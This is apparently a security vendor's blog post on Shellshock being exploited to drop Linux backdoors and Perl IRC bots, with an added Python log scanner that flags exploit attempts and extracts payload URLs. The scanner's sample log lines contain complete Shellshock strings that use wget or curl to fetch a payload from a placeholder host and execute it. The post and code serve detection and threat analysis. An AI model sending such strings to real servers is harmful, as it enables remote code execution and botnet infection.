Since the Shellshock vulnerability (CVE-2014-6271) became public knowledge, our ThreatSeeker® Intelligence Cloud has seen evidence of this vulnerability being exploited in the wild to drop malware.

We shall illustrate one such example below:

Backdoors and Botnets

The malware we have observed being dropped through Shellshock exploitation has been served from various command and control (C&C) servers previously known to Websense Security Labs™. It has the following capabilities:

A Linux backdoor, capable of DDoS attacks, brute-force attacks on passwords, and receiving commands to execute from its C&C server.

A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.

The malware is downloaded to the target by exploiting the Shellshock vulnerability to invoke a command such as "curl" or "wget," after which the fetched payload is executed. To date, we have seen 4 variants of the Linux backdoor and several versions of the Perl-based IRC bot.
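The delivery chain described above leaves a recognisable trace in web server logs: the `() {` function-definition prefix that triggers the Shellshock bug sits in a CGI-exposed header (User-Agent, Referer, or the request line), followed by the wget or curl command that fetches the payload. The script below is an added example, not Websense tooling or code from this post, that scans Apache/nginx combined-format log lines for that pattern and pulls out the downloader and the payload URL so an analyst can pivot to the hosting infrastructure. The log lines and the dropper host (dropper.example.net) are constructed placeholders, not indicators from this campaign, and the detection covers only the classic `() { ...; };` form, not later variant encodings.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines (Apache/nginx "combined" format). The first
# carries the exploit in the User-Agent field, the second in the Referer
# field; the third is benign. dropper.example.net is a placeholder host.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:10:12:31 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /usr/bin/wget -q http://dropper.example.net/x.pl -O /tmp/x.pl; perl /tmp/x.pl"
203.0.113.9 - - [25/Sep/2014:10:12:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 77 "() { :;}; /usr/bin/curl -s http://dropper.example.net/bd -o /tmp/bd; chmod +x /tmp/bd; /tmp/bd" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:13:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Combined log format: src ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger: a bash function definition "() { ... };" at the
# start of an environment variable value. A CGI handler exports request
# headers as HTTP_USER_AGENT, HTTP_REFERER, etc., so anything after the
# closing "};" is executed by a vulnerable bash when it imports the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# The downloader stage seen in the wild: wget/curl followed by a payload URL.
DOWNLOADER_RE = re.compile(
    r'\b(wget|curl)\b[^;|&]*?((?:https?|ftp)://[^\s;\'"|&>]+)'
)

# Log fields that a CGI handler turns into environment variables.
HEADER_FIELDS = ("request", "referer", "ua")


def scan_log(text):
    """Return one finding per Shellshock attempt found in the log text.

    Each finding records the source IP, the field carrying the exploit,
    the command chain appended after the function body, and the
    (downloader, url) pairs it would fetch.
    """
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in HEADER_FIELDS:
            value = m.group(field)
            hit = SHELLSHOCK_RE.search(value)
            if not hit:
                continue
            findings.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "path": m.group("request").split(" ")[1] if " " in m.group("request") else "",
                "field": field,
                "command": value[hit.end():].strip(),
                "downloads": DOWNLOADER_RE.findall(value),
            })
    return findings


def payload_hosts(findings):
    """Distinct hosts serving payloads, sorted, for blocklisting or pivoting."""
    return sorted({urlsplit(url).hostname for f in findings for _, url in f["downloads"]})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['path']} via {f['field']}: {f['command']}")
    print("payload hosts:", payload_hosts(scan_log(SAMPLE_LOG)))
```

Point the script at a real access log by feeding the file contents to `scan_log`; hosts returned by `payload_hosts` are the next pivot, since in this campaign the same servers were reused as C&C.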

Popularity Since Vulnerability Disclosure

The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):

Figure 1: chart showing increase in prevalence of C&C associated with the above malware, peaking around September 25, 2014.

Infrastructure Re-Use

We have seen C&C traffic to these IPs over the past two months, showing that they were used for malicious and botnet campaigns prior to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as "vSkimmer." More recently, we have observed it serving up an IRC bot.

The spike that we saw on September 25, 2014, ties in with the use of these servers as command & control points for malware dropped through exploitation of the Shellshock vulnerability. We have deduced that these are likely compromised servers, since the same infrastructure also hosts legitimate websites. Cyber-criminals typically prefer compromised servers in order to piggyback on the reputation of those known hosts and to make themselves harder to trace.

Experience has taught us that as cyber-criminals zoom in on the vulnerable code, additional vulnerabilities in the same area are likely to surface; the initial Shellshock fix was indeed followed by further bash CVEs. We strongly recommend that you monitor such issues and apply mitigation accordingly.

We have updated our ThreatSeeker Intelligence Cloud to seek out likely candidates across the kill chain.